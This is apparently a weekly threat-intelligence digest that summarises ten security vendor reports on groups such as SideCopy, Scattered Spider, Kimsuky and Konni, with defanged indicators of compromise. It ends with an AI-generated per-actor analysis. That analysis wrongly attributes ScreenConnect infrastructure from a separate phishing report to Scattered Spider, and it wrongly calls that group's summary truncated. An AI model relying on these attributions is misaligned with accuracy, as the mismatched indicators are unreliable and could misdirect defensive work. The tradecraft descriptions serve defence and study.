Full Report
This is a weekly threat intelligence report review from RST Cloud. This week, we analysed 53 threat intelligence reports and compiled a summary of the findings, along with the relevant metadata that was extracted. You can find below a short summary of 10 reports, related threats, tools, threat actors, a link to the source, and a number of extracted indicators of compromise (IoCs) from the original reports. More granular information, including TTPs, on all reports is available via RST Report Hub.Title: Goodbye HTA, Hello MSI: New TTPs and Clusters of an APT driven by Multi-Platform AttacksLink: https://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/Summary: The Pakistan-linked cyber threat group SideCopy APT has evolved its attack strategies since late December 2024, expanding its targeting from Indian government, defense, and education sectors to critical infrastructure areas, including railways and oil & gas. A notable shift in tactics involves the transition from using HTML Application (HTA) files to adopting Microsoft Installer (MSI) packages for malware deployment, employing advanced techniques like DLL side-loading and reflective loading to evade detection. Recent campaigns have unveiled new malware, including CurlBack RAT, which utilizes sophisticated methods for data exfiltration and remote access while continuing to rely on phishing tactics to lure victims through deceptive emails. The group's operations are further characterized by leveraging compromised domains for hosting malicious content and displaying cross-platform capabilities by targeting both Windows and Linux systems.Threats: sidecopy_campaign dll_sideloading_technique xenorat spark_rat asyncrat curlback ares_rat poseidon transparenttribe_group meshagent_tool opendir spear-phishing_technique uac_bypass_technique hvnc_tool moonpeak kimsuky_group dragonspark_group tag-100_groupIndicators of compromise:-------------------------ip: 79[.]141[.]161[.]58:1256, 172[.]67[.]163[.]31, 104[.]21[.]13[.]17, 79[.]141[.]161[.]58domain: gadchiroli[.]egovservice[.]in, pen[.]egovservice[.]in, cpcontacts[.]egovservice[.]in, webdisk[.]egovservice[.]in, cpcalendars[.]egovservice[.]in, webmail[.]egovservice[.]in, dss[.]egovservice[.]in, cmc[.]egovservice[.]in, mail[.]egovservice[.]in, pakola[.]egovservice[.]in, pakora[.]egovservice[.]in, egovservice[.]in, drjagrutichavan[.]com, nhp[.]mowr[.]gov[.]in, pmshriggssssiwan[.]in, educationportals[.]in, updates[.]widgetservicecenter[.]com, updates[.]biossysinternal[.]com, www[.]dss[.]egovservice[.]in, www[.]cmc[.]egovservice[.]in, www[.]egovservice[.]in, www[.]pakola[.]egovservice[.]in, www[.]pakora[.]egovservice[.]inurl: https://egovservice[.]in/vvcmcrts, https://egovservice[.]in/vvcmc_safety_tank, https://egovservice[.]in/130521/13, https://egovservice[.]in/testformonline/test_form, https://egovservice[.]in/payroll_vvcmc, https://egovservice[.]in/pakora/egovservice[.]in, https://egovservice[.]in/dssrts, https://egovservice[.]in/cmc, https://egovservice[.]in/vvcmcrtsballarpur72, https://egovservice[.]in/dss, https://egovservice[.]in/130521/set_authority, https://egovservice[.]in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1, https://modspaceinterior[.]com/wp-content/upgrade/01, https://egovservice[.]in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/inst, http://egovservice[.]in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/clinsixfer[.]elf, http://egovservice[.]in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/2024-National-Holidays-RH-PER_N-1[.]pdf, https://updates[.]widgetservicecenter[.]com/antivmcommand, https://modspaceinterior[.]com/wp-content/upgrade/02/NDC65-Updated-Schedule[.]zip, https://modspaceinterior[.]com/wp-content/upgrade/01/NDC65-Updated-Schedule[.]htahash: - md5=0a67bfda993152c93a212087677f9b60, - md5=a5410b76d0cb36786e00d2968d3ab6e4, - md5=f404496abccfa93eed5dfda9d8a53dc6, - md5=0e57890a3ba16b1ac0117a624f262e61, - md5=57c2f8b4bbf4037439317a44c2263346, - md5=53eebedc3846b7cf5e29a90a5b96c803, - md5=97c3328427b72f05f120e9a98b6f9b09, - md5=0690116134586d41a23baed300fc6355, - md5=ef40f484e095f0f6f207139cb870a16e, - md5=9d189e06d3c4cefdd226e645a0b8bdb9, - md5=589a65e0f3fe6777d17d0ac36ab07f6f, - md5=0eb9e8bec7cc70d603d2d8b6efdd6bb5, - md5=8ceeeec0e33026114f028cbb006cb7fc, - md5=1d65fa0457a9917809660fff782689fe, - md5=7637cbfa99110fe8e1074e7aad66710e, - md5=32a44a8f7b722b078b647e82cb9e85cf, - md5=a2dc9654b99f656b4ab30cf5d97fe2e1, - md5=b45aa156aef2ad2c77b7c623a222f453, - md5=83ce6ee6ad09a466eb96f347a8b0dc20, - md5=cf6681cf1f765edb6cae81eeed389f78, - md5=c952aca2036d6646c0cffde9e6f22775, - md5=b5e71ff3932c5ef6319b7ca70f7ba8da, - md5=e165114280204c39e99cf0c650477bf8, - md5=320bc4426f4f152d009b6379b5257c78, - md5=9de50f9357187b623b06fc051e3cac4f, - md5=c9c98cf1624ec4717916414922f196beemail: gsosystems-ndc@outlook[.]comTitle: Scattered Spider: Still Hunting for Victims in 2025Link: https://www.silentpush.com/blog/scattered-spider-2025/Summary: Scattered Spider, also known as UNC3944, is a hacker collective that has been active since at least 2022, focusing on social engineering attacks to compromise sensitive user credentials and authentication tokens. As of early 2025, the group has targeted various high-profile brands, employing five unique phishing kits that have evolved over time and revealing a decline in legacy tactics. One significant development is the updated Spectre Remote Access Trojan (RAT), which features advanced stealth capabilities and enhanced command and control mechanisms, demonstrating the group's ongoing tactical advancement. Their phishing strategies often involve swiftly registered domains that mimic legitimate services, making detection challenging, and they have recently shifted to hosting providers that offer more anonymous infrastructure. Despite facing legal actions against some members, the overall threat from Scattered Spider continues to be significant, as their operational methodologies adapt to bypass evolving defenses.Threats: 0ktapus_group karma spectre_rat fireblock_tool muddywater_group cryptochameleon robinhood evilginx_tool mitm_techniqueIndicators of compromise:-------------------------ip: 149[.]28[.]110[.]16, 66[.]42[.]117[.]61domain: twitter-okta[.]com, klv1[.]it[.]com, corp-asurion[.]com, okta-louisvuitton[.]com, morningstar-okta[.]com, corp-hubspot[.]com, pure-okta[.]com, signin-nydig[.]com, sso-instacart[.]com, sts-vodafone[.]com, asurion-idp[.]com, sytemstern[.]net, xn--gryscale-ox0d[.]com, iyft[.]net, squarespacehr[.]com, mytsl[.]net, prntsrc[.]net, corp-foundever[.]net, freshworks-hr[.]com, klaviyo-hr[.]com, login[.]freshworks-hr[.]com, login[.]hr-intercom[.]com, activecampiagn[.]net, acwa-apple[.]com, okta-ziffdavis[.]com, pfchangs-support[.]com, paxos-my-salesforce[.]com, okta-onsolve[.]com, okta-ripple[.]com, dashboard-iterable[.]com, onsolve-okta[.]com, tmobile-okta[.]com, corp-azure[.]com, corporatetools-okta[.]com, hr-myccmortgage[.]com, hr-synovus[.]com, 7-eleven-hr[.]com, bell-hr[.]com, cts-comcast[.]com, doordash-support[.]com, docusign-okta[.]com, commonspiritcorp-okta[.]com, citrix-okta[.]com, itbit-okta[.]com, globaldata-cloud[.]com, bestbuy-cdn[.]com, duelbits-cdn[.]com, gucci-cdn[.]com, simpletexting-cdn[.]com, telnyx-cdn[.]comurl: https://x[.]com/lontze7/status/1882367142823367121, https://github[.]com/kgretzky/evilginx2hash: email: theodexer@gmail[.]com, railnet@gmail[.]comTitle: Whats Trending: Top Cyber Attacker Techniques, December 2024February 2025Link: https://www.reliaquest.com/blog/threat-spotlight-cyber-attacker-techniques-dec-2024-to-feb-2025/Summary: Between December 2024 and February 2025, ReliaQuest documented a notable increase in cyber threats, particularly from financially motivated actors, with a 21.3% rise in initial access attempts via VPN brute-forcing targeting remote-access devices. The group "Black Basta" was highlighted for using automated brute-forcing tools, while a significant malicious discovery involved the misuse of the open-source tool System Informer to execute unauthorized commands after a Windows Administrator account was compromised. Additionally, the analysis revealed a rise in MSHTA proxy execution through deceptive CAPTCHA tactics, alongside the emergence of the "Sneaky 2FA" phishing kit, enabling attackers to bypass multi-factor authentication easily. The report also identified CL0P ransomware as a leading threat actor, noted for exploiting vulnerabilities in widely used software, particularly within the retail sector, and anticipated a rapid evolution in the cyber threat landscape with increased specialization in attack techniques.Threats: storm_1811_group clop blackbasta clearfake spear-phishing_technique sneaky_2fa_tool aitm_technique credential_harvesting_technique teamsphisher_tool clickfix_technique supply_chain_technique stac5777_group microsoft_quick_assist_tool dll_sideloading_technique lumma_stealer ransomhub blackbasta_group xfiles_stealerIndicators of compromise:-------------------------ip: 98[.]185[.]158[.]20, 94[.]156[.]227[.]69, 174[.]114[.]231[.]18, 74[.]206[.]139[.]3, 207[.]188[.]157[.]230, 87[.]103[.]126[.]54, 94[.]156[.]227[.]68, 94[.]156[.]227[.]71, 76[.]138[.]103[.]65, 40[.]126[.]229[.]236, 189[.]182[.]97[.]191, 103[.]35[.]189[.]243, 128[.]234[.]18[.]140, 94[.]156[.]227[.]70, 45[.]61[.]150[.]97, 62[.]60[.]154[.]163, 82[.]42[.]84[.]202, 173[.]44[.]141[.]50, 107[.]158[.]128[.]20, 196[.]251[.]117[.]191, 47[.]249[.]3[.]152, 76[.]154[.]146[.]156, 94[.]156[.]227[.]67, 68[.]61[.]206[.]86, 95[.]158[.]13[.]3, 91[.]205[.]164[.]183, 88[.]97[.]239[.]161, 98[.]158[.]100[.]22, 78[.]46[.]67[.]201, 13[.]86[.]223[.]89, 52[.]148[.]43[.]94domain: assets-gbr[.]mkt[.]dynamics[.]com, files-share[.]portseattles[.]org, xx[.]retweet[.]shop, human-verify[.]shop, sirax[.]shop, teroniga[.]shop, lack-behind-came-verification[.]trycloudflare[.]com, u1[.]tightlyreporter[.]shop, sandbox[.]yunqof[.]shop, igameinfinity[.]shopurl: http://human-verify[.]shop/xfiles/verify[.]mp4, http://sirax[.]shop/redclaprubz[.]m4a, http://teroniga[.]shop/remingofugu[.]m4a, http://lack-behind-came-verification[.]trycloudflare[.]com/cloudfla, http://u1[.]tightlyreporter[.]shop/sosalkino[.]mov, http://sandbox[.]yunqof[.]shop/macan[.]mp3, http://igameinfinity[.]shop/suno[.]mp3hash: email: admin1@doctorcalibr[.]onmicrosoft[.]com, admink@caudexcos[.]onmicrosoft[.]com, admin_441@vanssaluform[.]onmicrosoft[.]com, admin_234@gazetaweb787[.]onmicrosoft[.]com, admin_123@strongshangdi696[.]onmicrosoft[.]com, admin_97@hipdf[.]onmicrosoft[.]com, admin_23@aulnayimmobilier[.]onmicrosoft[.]com, admin_26@fitteix[.]onmicrosoft[.]com, admin_26@tntheatre674[.]onmicrosoft[.]comTitle: AkiraBot | AI-Powered Bot Bypasses CAPTCHAs, Spams Websites At ScaleLink: https://www.sentinelone.com/labs/akirabot-ai-powered-bot-bypasses-captchas-spams-websites-at-scale/Summary: AkiraBot is an advanced spam framework that targets website chats and contact forms, primarily to promote low-quality SEO services, impacting over 400,000 websites since September 2024, with at least 80,000 successful spam occurrences. It utilizes OpenAI technology to generate unique, tailored spam messages, complicating detection efforts through methods that bypass CAPTCHA protections and manipulation of browser attributes. Originating as "Shopbot," AkiraBot has evolved to target various platforms and employs multiple concurrent threads to maximize its spamming efficiency while using proxies and a Telegram integration to manage its operations and evade detection effectively.Threats: akirabot_tool nextcaptcha_tool fastcaptcha_tool capsolver_tool smartproxy_tool residential_proxy_technique blackbastaIndicators of compromise:-------------------------ip: 86[.]38[.]202[.]110domain: goservicewrap[.]com, mail[.]servicewrap-go[.]com, unj[.]digital, smtp[.]unj[.]digital, servicewrapgo[.]com, beservicewrap[.]pro, firstpageprofs[.]com, getkira[.]info, go-servicewrap[.]com, gogoservicewrap[.]com, joinnowkira[.]org, joinnowservicewraps[.]pro, joinservicewrap[.]com, kiraone[.]info, letsgetcustomers[.]com, loveservice-wrap[.]com, mybkira[.]info, onlyforyoursite[.]com, searchengineboosters[.]com, service-wrap[.]com, servicewrap-go[.]com, servicewrap[.]pro, servicewrapone[.]com, topservice-wrap[.]pro, topservicewrap[.]com, usekiara[.]com, wantkiara[.]info, wearetherealpros[.]com, wejoinkir[.]vip, wethekira[.]shop, wetheservicewrap[.]prourl: hash: - sha1=09ec44b6d3555a0397142b4308825483b479bf5a, - sha1=0de065d58b367ffb28ce53bc1dc023f95a6d0b89, - sha1=13de9fcd4e7c36d32594924975b7ef2b91614556, - sha1=2322964ea57312747ae9d1e918811201a0c86e9c, - sha1=253684ea43cb0456a6fec5728e1091ff8fcb27cf, - sha1=36b4e424ce8082d7606bb9f677f97c0f594f254d, - sha1=3a443c72995254400da30fe203f3fbf287629969, - sha1=3a7cc815b921166006f31c1065dadfeb8d5190e6, - sha1=4d24dd5c166fa471554ed781180e353e6b9642b7, - sha1=51ec20e5356bbebd43c03faae56fca4c3bbe318e, - sha1=55affc664472c4657c8534e0508636394eac8828, - sha1=5620b527dfc71e2ee7efb2e22a0441b60fd67b84, - sha1=5fde3180373c420cfa5cfdea7f227a1e1fe6936c, - sha1=62e66bae4b892593009d5261d898356b6d0be3ef, - sha1=6b65c296d9e1cda5af2f7dab94ce8e163b2a4ca8, - sha1=6c56b986893dd1de83151510f4b6260613c5fbb9, - sha1=6f342ff77cd43921210d144a403b8abb1e541a8b, - sha1=7129194c63ae262c814da8045879aed7a037f196, - sha1=71464c4f145c9a43ade999d385a9260aabcbf66d, - sha1=730192b0f62e37d4d57bae9ff14ec8671fbf051e, - sha1=769aa6ab69154ca87ccba0535e0180a985c21a0c, - sha1=76aab3ab0f3f16cf30d7913ff767f67a116ff1e7, - sha1=853fde052316be7887474996538b31f6ac0c3963, - sha1=9d43494c6f87414c67533cce5ec86754311631fc, - sha1=9f6ed2427e959e92eb1699024f457d87fa7b5279, - sha1=aa72065673dc543e6bf627c7479bfe8a5e42a9c4, - sha1=aac26242f4209bc59c82c8f223fcf2f152ce44bc, - sha1=b643a1f2c4eb436db26763d5e2527f6bebe8bcbf, - sha1=bbd754e36aee4702b9f20b90d509248945add4ea, - sha1=cb194612ed003eaf8d8cf6ed3731f21f3edeb161, - sha1=cc63ee921c29f47612096c34d6ee3ef244b33db2, - sha1=e12c6911997d7c2af5550b7e989f1dc57b6733b8, - sha1=eae675812c4274502051d6f2d36348f77a8464a0, - sha1=f1c7c5d0870fd0abb7e419f2c2ba8df42fa74667, - sha1=f2e71c9cbc4a18482a11ca3f54f2c958973360b4, - sha1=fb7fdcc2fe11e95065a0ce9041348984427ca0f4email:Title: BeaverTail and Tropidoor Malware Distributed via Recruitment EmailsLink: https://asec.ahnlab.com/en/87299/Summary: On November 29, 2024, a cyber incident was identified where threat actors impersonated a recruitment email from the developer community Dev.to to disseminate malware, specifically a malicious code named BeaverTail and a downloader labeled "car.dll." The malware, linked to North Korean cyber activities, primarily targets information theft and can execute additional payloads; it was found to communicate with command and control servers, gathering system information and employing advanced encryption techniques. Analysis revealed "car.dll" exhibits similarities with LightlessCan malware, and its execution path included suspicious identifiers, while techniques for obfuscation and credential extraction were noted in the behavior of BeaverTail.Threats: beavertail tropidoor lightlesscan lazarus_group invisibleferret spear-phishing_techniqueIndicators of compromise:-------------------------ip: 135[.]181[.]242[.]24, 191[.]96[.]31[.]38domain: url: http://103[.]35[.]190[.]170/Proxy[.]php, http://86[.]104[.]72[.]247/Proxy[.]php, https://45[.]8[.]146[.]93/proxy/Proxy[.]php, https://86[.]104[.]72[.]247/proxy/Proxy[.]phphash: - md5=3aed5502118eb9b8c9f8a779d4b09e11, - md5=84d25292717671610c936bca7f0626f5, - md5=94ef379e332f3a120ab16154a7ee7a00, - md5=b29ddcc9affdd56a520f23a61b670134email:Title: Shuckworm Targets Foreign Military Mission Based in UkraineLink: https://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteelSummary: Shuckworm, a cyber espionage group with ties to Russia, has intensified its campaign against Ukraine in 2025, specifically targeting military operations linked to a Western nation. The group is employing an updated infostealer tool known as GammaSteel, transitioning from VBS scripts to PowerShell to enhance its tactics, which include a multi-stage approach for maintaining stealthy communication with command and control (C&C) servers. The infection vector was identified on February 26 through a registry change related to a malicious shortcut file from an external drive, leading to the collection of sensitive system data and establishing connections to C&C servers, which leveraged legitimate services for address resolution. The malware's architecture facilitates the execution of reconnaissance tasks and the exfiltration of data, utilizing a Tor network proxy when needed to mask its activities.Threats: gamaredon_group gammasteelIndicators of compromise:-------------------------ip: 107[.]189[.]19[.]218, 3[.]73[.]33[.]225, 107[.]189[.]19[.]137, 64[.]23[.]190[.]235, 165[.]232[.]153[.]27, 172[.]104[.]187[.]254, 85[.]92[.]111[.]12, 45[.]61[.]166[.]43, 159[.]223[.]50[.]199, 139[.]59[.]136[.]192, 104[.]16[.]231[.]132domain: position[.]crudoes[.]ru, www[.]phlovel[.]ru, lucystew[.]ru, areas-apps-civic-loving[.]trycloudflare[.]com, des-cinema-democrat-san[.]trycloudflare[.]com, distributors-marble-saddam-much[.]trycloudflare[.]com, nav-ni-furnished-handy[.]trycloudflare[.]com, surfing-programmer-morris-mortality[.]trycloudflare[.]com, affects-periodic-explorer-broadband[.]trycloudflare[.]com, abraham-lc-happened-ericsson[.]trycloudflare[.]com, argentina-references-rapid-selecting[.]trycloudflare[.]com, beverly-cups-soft-concentrate[.]trycloudflare[.]com, boxes-harvest-cameroon-uniform[.]trycloudflare[.]com, cables-tension-bronze-hans[.]trycloudflare[.]com, convergence-suffering-reel-ingredients[.]trycloudflare[.]com, detector-excluded-knowledgestorm-two[.]trycloudflare[.]com, fee-ss-launch-remedies[.]trycloudflare[.]com, ff-susan-config-mod[.]trycloudflare[.]com, nail-employed-icon-pre[.]trycloudflare[.]com, pdt-throwing-pod-places[.]trycloudflare[.]com, presents-turner-cir-hollow[.]trycloudflare[.]com, promptly-allows-pendant-close[.]trycloudflare[.]com, reflection-tomorrow-brook-dakota[.]trycloudflare[.]com, representatives-liable-sight-tigers[.]trycloudflare[.]com, sick-netherlands-alumni-electric[.]trycloudflare[.]com, terry-training-springer-engagement[.]trycloudflare[.]com, farming-alternatively-velvet-warming[.]trycloudflare[.]com, pays-habitat-florists-virtually[.]trycloudflare[.]com, jet-therapy-cape-correctly[.]trycloudflare[.]com, der-grande-transmitted-benchmark[.]trycloudflare[.]com, eddie-lewis-exercises-conventions[.]trycloudflare[.]com, jon-shopzilla-canada-analytical[.]trycloudflare[.]com, hints-heated-terrain-poem[.]trycloudflare[.]com, belongs-tells-sum-harvest[.]trycloudflare[.]com, obj-sudan-quote-aw[.]trycloudflare[.]com, acquisition-gray-advertisements-trained[.]trycloudflare[.]com, missouri-itunes-recognize-adds[.]trycloudflare[.]com, over-function-foo-school[.]trycloudflare[.]com, criterion-receipt-proceeds-fate[.]trycloudflare[.]com, phpbb-zealand-hop-magnetic[.]trycloudflare[.]com, score-adams-coastal-moreover[.]trycloudflare[.]comurl: https://telegra[.]ph/Mark-01-20-5, https://t[.]me/s/futar23, https://des-cinema-democrat-san[.]trycloudflare[.]com/server, http://172[.]104[.]187[.]254/mood/1/3/2025/confer[.]html?=REMOVED, http://64[.]23[.]190[.]235/getinfo[.]php, https://surfing-programmer-morris-mortality[.]trycloudflare[.]com, https://areas-apps-civic-loving[.]trycloudflare[.]com, https://nav-ni-furnished-handy[.]trycloudflare[.]comhash: - sha256=714aeb3d778bbd03d0c9eaa827ae8c91199ef07d916405b7f4acd470f9a2a437, - sha256=90ec1f4dd69c84c3eb0b2cada4a31168de278eff9b21cb20551ec39d5bcb9da2email:Title: Kimsuky (APT-Q-2) suspected to launch an attack on Korean companiesLink: https://www.ctfiot.com/236795.htmlSummary: Kimsuky, a cyber threat actor group from North Korea, has been targeting South Korean entities since at least 2012, focusing on stealing sensitive information using techniques like social engineering and spear phishing. Recent analysis by the Qi'anxin Threat Intelligence Center revealed malware associated with Kimsuky that utilized a legitimate digital signature from a South Korean software company, employing various tactics for command and control communication and offering functionalities such as data collection and the execution of additional payloads. The malware exhibits advanced features, including environment checks and self-destruction capabilities, while remaining consistent with previous Kimsuky attacks through naming conventions and operational strategies designed to evade detection.Threats: kimsuky_groupIndicators of compromise:-------------------------ip: 104[.]37[.]184[.]39domain: gtfydu[.]surfnet[.]ca, auth[.]worksmobile[.]r-e[.]kr, secure[.]navdomain[.]n-e[.]kr, login[.]hiwork[.]o-r[.]kr, auth[.]linkedin[.]r-e[.]kr, sudifo[.]ftp[.]shurl: http://gtfydu[.]surfnet[.]ca/index[.]php, http://sudifo[.]ftp[.]sh/index[.]phphash: - md5=6efa53232350a76a52c7050b548ffe83, - md5=a52e10dd48d64372d94f87d8eb7ed8bf, - md5=0f06fe847a43108a211233a9c7aa9780, - md5=e8f5d4bbf96855f7f4ad0ff4d67efe5e, - md5=920f408fdc80c5697739cda9cf9a4ca7, - md5=d37569b238ec6c073a06a28bc665072cemail:Title: Continated stone: Sapphire Werewolf uses a new version of Amethyst Stealer for attacks on fuelLink: https://bi.zone/expertise/blog/kamen-ogranennyy-sapphire-werewolf-ispolzuet-novuyu-versiyu-amethyst-stealer-dlya-atak-na-tek/Summary: The Sapphire Werewolf threat cluster has developed an updated version of the Amethyst Stealer malware, primarily distributed through phishing emails targeting fuel and energy companies. This enhanced malware incorporates sophisticated techniques to avoid detection by identifying virtual environments and utilizing methods like Triple DES encryption. The malicious payload, disguised as a benign "Service note.rar" attachment containing a harmful executable, is capable of collecting extensive system information and exfiltrating sensitive data such as authentication credentials through a hardcoded URL, thereby reinforcing the cluster's capabilities in bypassing security measures.Threats: sapphire_werewolf_group amethyst dotnet_reactor_toolIndicators of compromise:-------------------------ip: domain: wondrous-bluejay-lively[.]ngrok-free[.]appurl: http://canarytokens[.]com/traffic/tags/static/xjemqlqirwqru9pkrh3j4ztmf/payments[.]jshash: - sha256=4149b07d9fdcd04b34efa0a64e47a1b9581ff9d1f670ea552b7c93fb66199b5f, sha1=94034e04636bc4450273b50b07b45f636ff59b05, md5=93d048364909018a492c8f709d385438email:Title: Pick your Poison — A Double-Edged Email AttackLink: https://cofense.com/blog/pick-your-poison-a-double-edged-email-attackSummary: The Cofense Phishing Defense Center has identified a sophisticated cyber-attack campaign that leverages phishing tactics to steal Office365 credentials and distribute malware. This campaign uses a file deletion reminder in emails, which appear to be from a legitimate file-sharing service, to deceive users into clicking links that lead to a malicious PDF file. Inside the PDF, two hyperlinks disguised as legitimate options direct victims to a spoofed Microsoft login page and initiate the installation of the ConnectWise Remote Access Tool (RAT), which enables unauthorized remote access. The malware employs persistence techniques to ensure it remains operational on compromised systems, highlighting the significant risks posed by this campaign.Threats: connectwise_tool screenconnect_toolIndicators of compromise:-------------------------ip: 104[.]26[.]0[.]31, 64[.]72[.]205[.]63, 139[.]178[.]89[.]78domain: url: http://instance-i4zsy0-relay[.]screenconnect[.]com:443, https://www[.]files[.]fm/u/jv2stwauw7, https://femaxpipeworks[.]com/LgGxTNCi, https://apsxsecured[.]screenconnect[.]com/Bin/SecuredOnedrive[.]ClientSetup[.]exe?e=Access&y=Guesthash: - sha256=2e9fb32df9b7e36c32a6348f201655f3cc6e1843d4fbcd93174743ec64897e70, md5=d3ed45f0dfadc24c76245b036b3b9738, - md5=8a17521918bc248d3ef11de3ba36926f, sha256=aae6ae55eba4ca78041c35694a65ac08a8e6ed54eb377398e93d6a985d7b1cc7, - sha256=ec1c7f33fd871b544a2992c0af60cde0ffcc829e7bf73baad6470f4225761ef2, md5=b9cd7bc4f514e595561509de2177e457, - sha256=06df948c816fc30e69d3ea30733d0d11989c9bfd68f3d3919ceef3f8410ea1bb, md5=495c7845de1d5bd46884ef03d66d4447email:Title: Analyzing spear-phishing campaign by Konni APT.Link: https://prii308.github.io/Analyzing-spear-phishing-campaign-by-Konni-APT/Summary: The Konni APT group's cyber campaign employs a multi-stage malware delivery method, beginning with a malicious LNK file that connects to a Dropbox-hosted command-and-control (C2) server to download further payloads. This LNK file uses `mshta.exe` to execute hidden malicious code, which, after processing, extracts a PowerShell script that communicates with a specific IP address and downloads additional malicious content. The operation ensures persistence by scheduling tasks to run every five minutes, and employs obfuscated JavaScript to execute harmful PowerShell commands while managing downloaded files and their outputs systematically.Threats: spear-phishing_technique scarcruft_group kimsuky_groupIndicators of compromise:-------------------------ip: 64[.]20[.]59[.]148domain: url: https://www[.]dropbox[.]com/scl/fi/ouck6s5mxghmwz57tzkzj/Sm[.]dat?rlkey=2a6qys5xgufg2ouk93or0vmcr&st=zzaqdclb&dl=1hash: - sha256=6fb3dfe451b37b0304a42e62759bf3670d5b4dd0232621dac0739061fa4704e2, - sha256=1a61340179c811b17c332452cfd1d7277d615697a6993ca870834b91e7070975, - sha256=9ce42177bafe552495b8329726bb4acfcb5f9e886377a2e76fb901fa01ae407c, - sha256=ec78b61a5f54805bbdffd69d57ce76db41d1adbb85c544688769eacf29d928cb, - sha256=a1376496406895a00d9009b36a6e1073553f3198502a71d33d7438e68914261aemail:This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
Analysis Summary
Based on the provided article excerpts, the following threat actors and information were identified:
# Threat Actor: SideCopy APT
## Attribution & Identity
Pakistan-linked cyber threat group.
## Activity Summary
Evolved attack strategies since late December 2024. Expanded targeting from Indian government, defense, and education sectors to critical infrastructure (railways and oil & gas). Shifted from using HTA files to MSI packages for malware deployment. Campaigns involve data exfiltration and remote access.
## Tactics, Techniques & Procedures
- Transition from using HTML Application (HTA) files to deploying malware via Microsoft Installer (MSI) packages.
- Employing DLL side-loading for evasion.
- Employing reflective loading for evasion.
- Utilizing spear-phishing tactics via deceptive emails.
- Leveraging compromised domains for hosting malicious content.
- Cross-platform capabilities targeting Windows and Linux.
## Targeting
- Sectors: Indian government, defense, education, critical infrastructure (railways, oil & gas).
- Geography: India (implied by targeting focus).
- Victims: Not specifically named, but sectors are defined.
## Tools & Infrastructure
- Malware families used: CurlBack RAT (new malware for remote access/exfiltration), xenorat, spark\_rat, asyncrat, ares\_rat, poseidon, meshagent\_tool, hvnc\_tool.
- Infrastructure (C2, domains, IPs): Compromised domains used for hosting malicious content.
- **Domains:** gadchiroli\[.\]egovservice\[.\]in, pen\[.\]egovservice\[.\]in, cpcontacts\[.\]egovservice\[.\]in, webdisk\[.\]egovservice\[.\]in, cpcalendars\[.\]egovservice\[.\]in, webmail\[.\]egovservice\[.\]in, dss\[.\]egovservice\[.\]in, cmc\[.\]egovservice\[.\]in, mail\[.\]egovservice\[.\]in, pakola\[.\]egovservice\[.\]in, pakora\[.\]egovservice\[.\]in, egovservice\[.\]in, drjagrutichavan\[.\]com, nhp\[.\]mowr\[.\]gov\[.\]in, pmshriggssssiwan\[.\]in, educationportals\[.\]in, updates\[.\]widgetservicecenter\[.\]com, updates\[.\]biossysinternal\[.\]com.
- **URLs:** https://egovservice\[.\]in/vvcmcrts, https://egovservice\[.\]in/vvcmc\_safety\_tank, https://egovservice\[.\]in/130521/13, https://egovservice\[.\]in/testformonline/test\_form, https://egovservice\[.\]in/payroll\_vvcmc, https://egovservice\[.\]in/pakora/egovservice\[.\]in, https://egovservice\[.\]in/dssrts, https://egovservice\[.\]in/cmc, https://egovservice\[.\]in/vvcmcrtsballarpur72, https://egovservice\[.\]in/dss, https://egovservice\[.\]in/130521/set\_authority, https://egovservice\[.\]in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER\_N-1, https://modspaceinterior\[.\]com/wp-content/upgrade/01, https://egovservice\[.\]in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER\_N-1/lns/clinsixfer\[.\]elf, http://egovservice\[.\]in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER\_N-1/lns/2024-National-Holidays-RH-PER\_N-1\[.\]pdf, https://updates\[.\]widgetservicecenter\[.\]com/antivmcommand, https://modspaceinterior\[.\]com/wp-content/upgrade/02/NDC65-Updated-Schedule\[.\]zip, https://modspaceinterior\[.\]com/wp-content/upgrade/01/NDC65-Updated-Schedule\[.\]hta.
- **IPs:** 79\[.\]141\[.\]161\[.\]58:1256, 172\[.\]67\[.\]163\[.\]31, 104\[.\]21\[.\]13\[.\]17.
## Implications
SideCopy APT is demonstrating agile adaptation by replacing older delivery methods (HTA) with newer techniques (MSI packages) and by expanding its focus into India's vital national infrastructure sectors, increasing risk to national stability.
## Mitigations
- Harden defenses against MSI-based malware execution.
- Implement robust detection for DLL side-loading and reflective loading patterns.
- Enhance monitoring and analysis of spear-phishing attempts targeting the identified critical sectors.
***
# Threat Actor: Scattered Spider (UNC3944)
## Attribution & Identity
Also known as UNC3944.
## Activity Summary
Reportedly active and hunting for victims into 2025. *Note: The context is too truncated to provide specific campaign details.*
## Tactics, Techniques & Procedures
Not detailed in the provided excerpt.
## Targeting
Not detailed in the provided excerpt beyond the general statement of "Hunting for Victims."
## Tools & Infrastructure
- **Infrastructure:**
- RDP/ScreenConnect: http://instance-i4zsy0-relay\[.\]screenconnect\[.\]com:443
- File Hosting: https://www\[.\]files\[.\]fm/u/jv2stwauw7
- Malicious Download: https://femaxpipeworks\[.\]com/LgGxTNCi
- Malicious Download: https://apsxsecured\[.\]screenconnect\[.\]com/Bin/SecuredOnedrive\[.\]ClientSetup\[.\]exe?e=Access&y=Guest
## Implications
Remains an active and persistent threat actor projecting activity into the near future (2025).
## Mitigations
- Review security controls related to remote access solutions like ScreenConnect.
- Scrutinize traffic to generic file hosting services used for initial payload delivery.
***
# Threat Actor: Konni APT
## Attribution & Identity
Konni APT group. Associated with groups like Scarcruft and Kimsuky (mentioned in context of related threats, though not definitive attribution).
## Activity Summary
Employs a multi-stage malware delivery method involving spear-phishing. The operation focuses on persistence and systematic execution management.
## Tactics, Techniques & Procedures
- Initial access via malicious LNK files.
- C2 communication leveraging Dropbox for initial payload download (using *Sm.dat*).
- Command execution via `mshta.exe` to run hidden malicious code.
- Payload delivery via execution of obfuscated JavaScript, which in turn connects to a specific IP for further malicious content download (PowerShell scripts).
- Establishes persistence by creating scheduled tasks that run every five minutes.
- Uses obfuscated JavaScript to execute harmful PowerShell commands.
## Targeting
- No specific sectors or geographies detailed in the excerpt, but tactics suggest targeted activity (spear-phishing).
## Tools & Infrastructure
- **Delivery Mechanism:** Malicious LNK file, Dropbox hosting.
